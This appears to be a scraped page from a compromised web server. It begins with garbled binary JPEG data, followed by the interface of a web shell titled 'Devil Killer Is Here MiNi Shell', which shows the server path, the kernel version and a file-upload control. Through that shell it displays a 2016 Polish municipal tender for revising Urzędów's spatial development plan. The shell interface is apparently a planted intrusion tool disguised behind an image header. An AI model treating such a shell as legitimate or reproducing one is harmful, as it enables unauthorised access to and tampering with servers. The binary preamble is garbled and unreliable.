JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/42367-N-2016.html

<p class="kh_header"><b>Urzędów: Zmiana miejscowego planu zagospodarowania przestrzennego  gminy Urzędów wraz ze  zmianą studium uwarunkowań i kierunków zagospodarowania przestrzennego  gminy Urzędów.</b><br>
<b>Numer ogłoszenia: 42367 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urzędów , ul. Rynek 26, 23-250 Urzędów, woj. lubelskie, tel. 81 822 50 42, faks 81 822 51 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurzedow.bip.lubelskie.pl zakładka ogłoszenia, zakładka przetargi</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zmiana miejscowego planu zagospodarowania przestrzennego  gminy Urzędów wraz ze  zmianą studium uwarunkowań i kierunków zagospodarowania przestrzennego  gminy Urzędów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
1. Opracowanie analizy zasadności przystąpienia do sporządzenia zmian w miejscowym planie zagospodarowania przestrzennego gminy Urzędów i stopnia zgodności przewidywanych rozwiązań z ustaleniami studium, zgodnie z art. 14 ust. 5 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (DZ.U. z 2015r. poz. 199 z póż. zm.).
Ilość wniosków do rozpatrzenia wg posiadanego rejestru  -  142 szt. (tj.  187 działek - zamówienie podstawowe). Dopuszcza się zwiększenie zakresu przedmiotu zamówienia w ramach zamówienia uzupełniającego , tj. do 20% ilości działek  zamówienia podstawowego.  W miarę zwiększenia się ilości działek -  proporcjonalnie zwiększyłoby się wynagrodzenie ( stosownie do  nw. zapisów punktu 5 i 6 niniejszej części III siwz).
Analiza będzie zawierać:
- zestawienie działek nadających się do przekształcenia poprzez zmiany w miejscowym planie zagospodarowania przestrzennego,
- zestawienie działek  nadających się do przekształcenia po zmianach w studium uwarunkowań i kierunków zagospodarowania przestrzennego,
- zestawienie działek  nie nadających się do przekształcenia ( z opisem dlaczego nie nadają się do przekształcenia),
- opis każdej działki pod względem zgodności lub niezgodności ze studium uwarunkowań i kierunków zagospodarowania przestrzennego.

2.  Opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Urzędów - granice obszaru objętego projektem zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów  -  teren zgodnie z wykazem działek z uwzględnieniem ww. analizy zasadności - w załączniku graficznym  obejmującym  teren całej gminy.

3.  Opracowanie projektu zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów -  granice obszaru objętego projektem zmiany miejscowego planu -  teren zgodnie z wykazem działek  z uwzględnieniem ww. analizy zasadności - w załączniku  obejmujący teren całej gminy.

4.  Powierzchnia gminy wynosi 11906 ha tj. ( 119,06 km2), a obszar objęty projektem zmiany mpzp -  187 działek według  rejestru tj.  około 56,10 ha.

 5.  W przypadku wystąpienia potrzeby udzielenia zamówienia uzupełniającego którego wartość przekroczy 30 000 euro , zamawiający potraktuje je jako nowy przedmiot zamówienia (nowa umowa)  przeprowadzając procedurę zamówienia z wolnej ręki na podstawie art. 67. ust. 1 pkt 6, ustawy Prawo zamówień publicznych,  między innymi zaprosi wykonawcę  do negocjacji (art. 66), zamawiający złoży oświadczenia (art. 17), przed podpisaniem umowy uzyska oświadczenia od wykonawcy (art. 68.2 w związku z art. 22, art. 24), prowadzenie protokołu postępowania (art. 96), podpisze umowę w formie pisemnej (art. 139.2), oraz po zawarciu umowy umieści ogłoszenie na podstawie art. 95 ustawy Prawo zamówień publicznych.

6.   W przypadku gdy wartość zamówienia uzupełniającego nie przekroczy kwoty 30 000 euro, zgodnie z art. 4 pkt 8  w tym zamówieniu nie stosujemy przepisów ustawy Prawo zamówień publicznych, a fakt wystąpienia zamówień uzupełniających będzie stwierdzony protokolarnie przy udziale zamawiającego i wykonawcy, w którym strony określą wysokość wynagrodzenia przy  założeniu, że ceny nie będą wyższe niż te które wykonawca zaoferował w ofercie na wykonanie zamówienia podstawowego.

7.  Zakres rzeczowy opracowania:
a)  opracowanie analizy zasadności przystąpienia do zmian w planie miejscowym dla wniosków (142 szt.) i  187 działek według  rejestru tj. obszar  około 56,10 ha.

b)  opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów i projektu zmiany miejscowego planu zagospodarowania przestrzennego Gminy Urzędów (teksty i rysunki)  należy  sporządzić zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. 2015r.  poz. 199 z późn. zm.), oraz rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U. z 2004r. Nr 118, poz. 1233), rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003r. w sprawie zakresu projektu miejscowego planu zagospodarowania przestrzennego gminy (Dz.U. Nr 164, poz. 1587), ustawą z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska (Dz.U. 2013,  poz. 1232 z p. zm.), oraz innymi przepisami prawa obowiązującymi w tym zakresie, między innymi obowiązki wynikające z ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2016 poz. 353);

c)        prognoza oddziaływania na środowisko zgodna z aktualnym prawem w szczególności w sprawie szczegółowych warunków  jakim powinna odpowiadać prognoza oddziaływania na środowisko dotycząca projektów miejscowych planów zagospodarowania przestrzennego;

d)       prognoza skutków finansowych uchwalenia planu miejscowego z uwzględnieniem art. 36 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym;

e)     wniosek wraz z załącznikami w celu uzyskania zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne, zgodnie z ustawą z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz.U. z 2015 poz. 909);

f)   projekt uchwały w sprawie uchwalenia zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Urzędów wraz z listą nieuwzględnionych uwag, oraz projekt uchwały w sprawie uchwalenia zmian planu miejscowego wraz z załącznikami i uzasadnieniem zgodnie z art. 20 ust. 1 ustawy o planowaniu i zagospodarowaniu przestrzennym;

g/  prowadzenie strony formalno-prawnej do czasu ogłoszenia uchwały Rady Miejskiej w Dzienniku Urzędowym Województwa  Lubelskiego,
Wykonawca jest zobowiązany do wykonania wszelkich czynności formalno - prawnych wynikających z art. 11  i art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym, do których  z mocy prawa jest zobowiązany Burmistrz ( nie obejmuje wysyłania korespondencji);

h)   udział w publicznej dyskusji nad przyjętymi w projekcie planu  rozwiązaniami,  udzielanie wyjaśnień na pytania dotyczące przedmiotu zamówienia i  udział w rozpatrywaniu uwag dotyczących  projektu planu, studium;

h)  dokonanie zmian wynikających z uzyskanych opinii i dokonanych uzgodnień oraz zmian wynikających z rozpatrzenia uwag;

i)   współpraca z Burmistrzem Urzędowa na wszystkich etapach sporządzania i uchwalania planu i studium, m.in.  udział w sesji  na której  uchwalany będzie studium oraz plan miejscowy ;

j)  sporządzenie dokumentacji prac planistycznych , zgodnie z par. 12 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego, aby przedstawić ją Wojewodzie w celu oceny jej zgodności z przepisami prawnymi i publikacją w Dzienniku Urzędowym Województwa  Lubelskiego;
k) zamawiający wymaga aby wykonawca opracował listę wniosków i uwag oraz uzasadnienia nieuwzględniania  ich w projekcie zmiany studium i zmiany planu miejscowego.

Wykonawca dokona opracowań  w następującej formie:
?a)	część opisową - tekst  zmiany planu miejscowego i zmiany  studium (stanowiących  treść  uchwał w sprawie uchwalenia zmiany planu miejscowego i zmiany studium) wykonana zostanie w ilości - po 3 egz. i w formie elektronicznej - po 1 egz.;
b)	część graficzną  - na aktualnych mapach sytuacyjno-wysokościowych w skali 1: 1000 rysunek zmiany planu miejscowego i zmiany studium w skali 1:25 000, stanowiących załączniki  do  uchwał w sprawie uchwalenia zmiany planu miejscowego i zmiany studium) w ilości po  3 egz  i w formie elektronicznej - po 1 egz.
 po 1 egz w technice i formacie zapewniających możliwość publikacji w dzienniku Urzędowym Województwa Lubelskiego ( również w wersji elektronicznej)
c)	prognoza oddziaływania na środowisko - 3 egz;
d)	prognoza skutków finansowych uchwalonych  opracowań - 3 egz;
e)	wniosek wraz z załącznikami w celu uzyskania zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze  i nieleśne - 2 egz., a w przypadku konieczności uzyskania zgody Ministra - 3 egz.;
f)	strategiczna ocena oddziaływania na środowisko - 3 egz.

Całość opracowania winna być przekazana Zamawiającemu także w formie zapisu elektronicznego wykonanego programem: tekst i grafika zapisane w formacie ogólnego dostępu.                                           

Dokumenty posiadane przez zamawiającego
-  studium uwarunkowań i kierunków zagospodarowania przestrzennego  gminy przyjęte  uchwałą
 Nr X-61-15  Rady Gminy Urzędów z dnia 3 lipca 2015r. w sprawie uchwalenia zmian Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów

-  miejscowy  plan zagospodarowania przestrzennego gminy Urzędów  przyjęty uchwałą 
Rady Gminy Urzędów Nr X-68-2003 z dnia 26 września 2003r (ogłoszoną w Dzienniku Urzędowym Województwa Lubelskiego nr 177 poz. 3542 z 19.11.2003r.),
ze zmianami wynikającymi z:
1)	uchwały Nr XLII-286-2006 Rady Gminy Urzędów z dnia 15 września 2006r. w sprawie uchwalenia zmian miejscowego planu zagospodarowania przestrzennego gminy Urzędów (ogłoszonej w Dz.Urz. Woj. Lubelskiego nr 188 poz. 2999 z dnia 15.12.2006r.),
2)	uchwały Nr XLII-287-2006 Rady Gminy Urzędów z dnia 15 września 2006r. w sprawie miejscowego planu zagospodarowania przestrzennego dla części działki 1176 w Zakościelnym, (ogłoszonej w Dz.Urz. Woj. Lubelskiego nr 188 poz. 3000 z dnia 15.12.2006r.)
3)	uchwały Nr XII-116-2007 Rady Gminy Urzędów z dnia 21 grudnia 2007r. w sprawie uchwalenia zmian miejscowego planu zagospodarowania przestrzennego gminy Urzędów (ogłoszonej w Dz.Urz. Woj. Lubelskiego nr 36 poz. 1174 z dnia 18.03.2008r.),
4)	uchwały Nr XXVIII-230-2009 Rady Gminy Urzędów z dnia 4 czerwca 2009r. w sprawie uchwalenia zmian miejscowego planu zagospodarowania przestrzennego gminy Urzędów - etap I, (ogłoszonej w Dz.Urz. Woj. Lubelskiego nr 100 poz. 2320, 2321 z dnia 27.08.2009r.),
5)	uchwały Nr XXXIV-261-2009 Rady Gminy Urzędów z dnia 27 listopada 2009r. w sprawie uchwalenia zmian miejscowego planu zagospodarowania przestrzennego gminy Urzędów - etap II, (ogłoszonej w Dz. Urz. Woj. Lubelskiego nr 3 poz. 35 z dnia 26.01.2010r.),
6)	uchwały Nr XLII-303-2010 Rady Gminy Urzędów z dnia 14 lipca 2010r. w sprawie uchwalenia zmian miejscowego planu zagospodarowania przestrzennego gminy Urzędów- etap III, (ogłoszonej w Dz. Urz. Woj. Lubelskiego nr 112 poz. 2042 z dnia 13.10.2010r.),
7)	uchwały Nr IX-64-2011 Rady Gminy Urzędów z dnia 10 sierpnia 2011r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów,
(ogłoszonej w Dz. Urz. Woj. Lubelskiego nr 135 poz. 2284 z dnia 12.09.2011r.),
8)	Uchwała nr XX-152-2012 Rady Gminy Urzędów  z dnia  21.09.2012r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów, (ogłoszonej w Dz. Urz. Woj. Lubelskiego poz. 3167 z dnia 25.10.2012r.),
9)	Uchwała nr XX-153-2012 Rady Gminy Urzędów z dnia 21.09.2012r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów, (ogłoszonej w Dz. Urz. Woj. Lubelskiego poz. 3168 z dnia 25.10.2012r.),
10)	Uchwała nr XXXIX-286-14 Rady Gminy Urzędów z dnia 25.04.2014r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów, (ogłoszonej w Dz. Urz. Woj. Lubelskiego poz. 2187 z dnia 13.06.2014r.).
- ekofizjografia Gminy Urzędów;
- kopie map sytuacyjno-wysokościowych i wypisy z rejestru gruntów dostarczy zamawiający.

8. Ww. dokumenty tj. studium uwarunkowań i kierunków zagospodarowania przestrzennego  gminy, -  miejscowy  plan zagospodarowania przestrzennego gminy Urzędów  ze zmianami dostępne są na stronie  internetowej Urzędu Miejskiego w Urzędowie  www.ugurzedow.bip.lubelskie.pl  zakładka prawo miejscowe, zakładka Uchwały Rady Gminy do 31.12.2015r. ( poszczególne ww. uchwały wraz z załącznikami graficznymi).

9. Wykonawca przenosi  na zamawiającego w ramach wynagrodzenia  przedstawionego w ofercie - majątkowe prawa autorskie do opracowania będącego przedmiotem zamówienia, na wszystkich polach eksploatacji jak w art. 50 ustawy z dnia 04.02.1994r. o prawie autorskim i prawach pokrewnych ( Dz.U. z 2006r. nr 90 poz. 631 z późn. zm.)

10. Wykonawca na dzień podpisania umowy dostarczy harmonogram realizacji prac związanych z ww. przedmiotem zamówienia  i zobowiązany będzie co miesiąc przedkładać zamawiającemu stan zaawansowania tych prac odnośnie zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Urzędów, jak i  zmiany miejscowego planu zagospodarowania przestrzennego gminy Urzędów, celem weryfikacji postępu prowadzonych prac. Nie dostosowanie się do tego wymagania zamawiający traktować będzie jako nienależyte wykonanie przedmiotu umowy.

Harmonogram prac będących przedmiotem niniejszego zamówienia obejmuje zakres czynności niezbędnych do uchwalenia zmian studium i zmian planu miejscowego, oraz jednokrotnego ponowienia  toku formalno-prawnego związanego z uwzględnieniem wniesionych uwag.

Zamawiający nie dopuszcza składania ofert częściowych
Zamawiający nie dopuszcza możliwości składania ofert wariantowych
Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przewiduje się udzielenie zamówień uzupełniających w wysokości 20 procent zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp - według załącznika nr 2 i oświadczenie o braku podstaw do wykluczenia - według załącznika nr 3;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane , oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dowodami, które mają potwierdzić czy usługi te zostały wykonane w sposób należyty są poświadczenia ( wskazujące wartości przedmiotu, daty wykonania i podmioty, na rzecz których usługi zostały wykonane) lub oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.	
Zamawiający wymaga wykonania usług - według wykazu załącznika nr 4, z którego ma  jednoznacznie wynikać wykonanie co najmniej jednego opracowania projektu miejscowego planu zagospodarowania przestrzennego lub projektu zmiany planu dla terenu o powierzchni minimum 30 ha, które zostały uchwalone i opublikowane w dzienniku urzędowym województwa, oraz co najmniej jednego opracowania projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego lub projektu zmiany studium, które uzyskały pozytywną ocenę wojewody dot. zgodności z przepisami prawa obejmujące obszary o  powierzchni nie mniej niż   6 000  ha.

W przypadku gdy wykonawca  wskaże w ofercie przetargowej podwykonawcę, który będzie wykonywał część usług w danym zamówieniu , zamawiający dopuszcza przyjęcie dokumentów potwierdzających doświadczenie w zakresie wykonywania ww. usług wystawionych na podwykonawcę ( mimo że nie mamy tutaj do czynienia z podmiotem składającym ofertę wspólnie).

W przypadku, gdy złożone przez Wykonawców dokumenty zawierające dane w innych walutach niż określono to w treści SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs średni walut NBP z dnia ogłoszenia niniejszego zamówienia w BZP. Tabele kursów walut dostępne są pod następującym adresem www.nbp.pl zakładka kursy walut.


2)    oświadczenie o posiadanych uprawnieniach według załącznika nr 5 - zamawiający wymaga posiadania uprawnień do samodzielnego projektowania zagospodarowania przestrzeni w  skali regionalnej i lokalnej przez co najmniej jedną osobę do kierowania pracami zespołu.


 Wykonawcy spoza terytorium RP muszą oprócz nabycia ww. kwalifikacji zawodowych ,muszą  posiadać decyzję o uznaniu tychże kwalifikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp - według załącznika nr 2 .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy dołączyć wykaz osób, (według  zał. nr 6) ,które będą uczestniczyć w wykonywaniu zamówienia , w szczególności odpowiedzialnych za świadczenie usługi ( przedmiot zamówienia), kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności , oraz informację  o podstawie  do dysponowania tymi osobami.
Należy podać przynajmniej  po jednej osobie wykonującej następujące opracowania:
-   prognozy oddziaływania na środowisko,
-   oceny ekonomicznej,
-   wniosku do zgody na wyłączenie z produkcji rolnej i leśnej na cele nierolnicze i nieleśne.
Osoby współpracujące (nie będące pracownikami wykonawcy), muszą dołączyć do oferty oświadczenie o podjęciu współpracy dla przedmiotu zamówienia.

W zespole autorskim musi być co najmniej jedna osoba do kierowania pracami zespołu,  posiadająca prawo samodzielnego projektowania w przestrzeni w skali regionalnej i lokalnej.
W przypadku obywateli państw członkowskich , osoby które nabyły kwalifikacje zawodowe do projektowania zagospodarowania przestrzeni i zagospodarowania przestrzennego w skali lokalnej i regionalnej oraz posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp - według załącznika nr 2 .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

